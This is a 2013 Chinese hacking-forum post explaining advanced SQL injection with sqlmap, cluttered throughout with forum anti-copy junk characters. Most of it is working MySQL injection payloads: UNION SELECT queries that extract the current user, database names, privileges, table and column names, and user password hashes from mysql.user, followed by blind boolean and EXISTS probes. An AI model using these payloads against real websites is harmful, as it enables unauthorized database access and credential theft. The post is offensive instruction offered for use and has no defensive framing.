找回密码
 立即注册
查看: 3112|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
+ f* O/ C6 N: E, K & l  |/ H" O7 w' c, r" O1 w
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表: V- M/ h. N% [# Z& K4 K7 [8 Y# C

, l' B# n" p! ^7 }分类标准        分类        备注
! `# ^$ M+ Q+ u+ l& W- n按字段类型        整型注入,字符型注入        2 q* B# m0 E. l; A! ]! A
按出现的位置        get注入,post注入,cookie注入,http header注入        0 e8 @8 w7 x! ^% D; k+ w* f2 ?4 }
然而高级注入是这样的
' L$ J4 R2 m/ s/ I$ ^+ Z 4 X( s/ C# Z+ k6 U+ f1 |- f
高级注入分类        条件" U* S, i7 e) y
error-based sql        数据库的错误回显可以返回,存在数据库,表结构$ A8 e: G3 J! M! k; @4 V5 W' r  i2 ?
union-based sql        能够使用union,存在数据库,表结构
& K( S. n$ S. h$ l4 W$ i! \blind sql        存在注入
4 U) ?% Q1 D2 x, J0 {. `$ f我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。- n% {6 @, A5 }+ t9 v6 M* L% v- T/ Q
' ~& X; q. H5 S2 ?
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火! \  i+ ?) w  i& c; h& o

4 W" k" p: B( F) {0 ^附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。# ~. U7 \0 H6 m0 j& B! s

0 Z$ S. a3 h( h) f这里用mysql说明
0 F' F- c& C: a# T+ A$ P
1 a  ?1 X$ Z# |6 Ie注入坛子里很多了,请看戳我或者再戳我
) @$ s" Y: X& H3 t, f# _ 2 `" a6 Z$ U( t( T! `* a, Q
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
& _( h9 n+ p6 Q# u9 V# w , H$ i4 M1 P- D. h8 H. A
获取当前数据库用户名
8 ~  \% s% y. ?7 M; C0 ] 6 a: Y- a. @  b" W6 E' _- Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
' ~% ^1 \: Z  Y9 K2 E: _/ dAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
+ j* K' f& O8 y6 V" U0 y3 fL, NULL#1 f6 v; W/ E; S8 O1 g3 b
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
+ Z2 c) ?" @  d
: h. \- ?7 X! X! r3 [获取数据库名7 o  [4 ]; R) S" ?$ b9 Q- p: `

3 `8 e/ }1 M, O" C9 ?! D; KUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  ]: h- s" S6 Q8 p获取所有用户名0 T! q& ]. s6 T' u1 _/ U
8 z! D* r4 B8 M% C6 O* O' v3 t8 r
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#) _( Y9 [+ k% a: B/ m. @- s
查看当前用户权限) L2 S! d0 r3 C/ D; N6 [$ {
, _9 A0 d0 V& @' ]* [- C
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
+ k$ u  u, L" {& g! f+ U+ s0 ^" j尝试获取密码,当然需要有能读mysql数据库的权限1 t; c0 ?, J; j8 O8 E6 L
3 W* E4 t' G+ |2 F4 C9 G
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
8 J% r' v  e! C. Z# ~) l4 j, y获取表名,limit什么的自己搞啦& v8 S! J# `; B. d7 ~
2 u( m" ?1 {+ j3 a4 r; L
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
$ @  H( ~7 s3 v+ r. M- C3 @获取字段名及其类型4 T' b2 W- K- p
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
! T/ _  N+ }: j5 A) [ % z: Z  g6 Y$ O1 W' J
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。: I  ]/ i! `9 m" X
1 T% |( g% z+ z( K
如:& i9 g  X/ ?( D! q4 {
获取当前用户名
5 o4 T9 }" q6 ^
, n8 z. p) m  G& c5 Q! q, eAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116, K& s9 _: z. |7 I2 G2 N
获取当前数据库
9 d2 o' N; M( @; V & V, |3 T4 N  m4 ~$ x
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
# x3 w! a% w, a. D( y8 ~1 a" ?  a5 }获取表名+ I: Z$ w' ?- |
, b' R: o. F1 Z3 N4 L: L$ c
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
9 `, _$ [% M3 Y' }3 F3 E  E获取字段名及其类型和爆内容就不说了,改改上面的就可以了。; G* @" e3 s4 s! s  g% {
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
5 h  [! |1 n$ W5 a1 I1 P1 C爆表
& p0 W( a+ G4 U' @* p / e& x6 H7 J% |% Q% S* R
AND EXISTS(select * from table)8 U! X  F' C% @: s3 [' g( O
爆字段( L, y/ U! @& {4 S3 u0 u+ P

% a5 e9 a9 F4 aAND EXISTS(select pwd from table)! }  O6 Z2 u- k
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
$ k! F: |6 b- A$ w6 r+ p; `
" h, _$ u9 [- a+ ?本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
/ W9 ?( O  S" _$ H. t$ W2 _- I1 A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表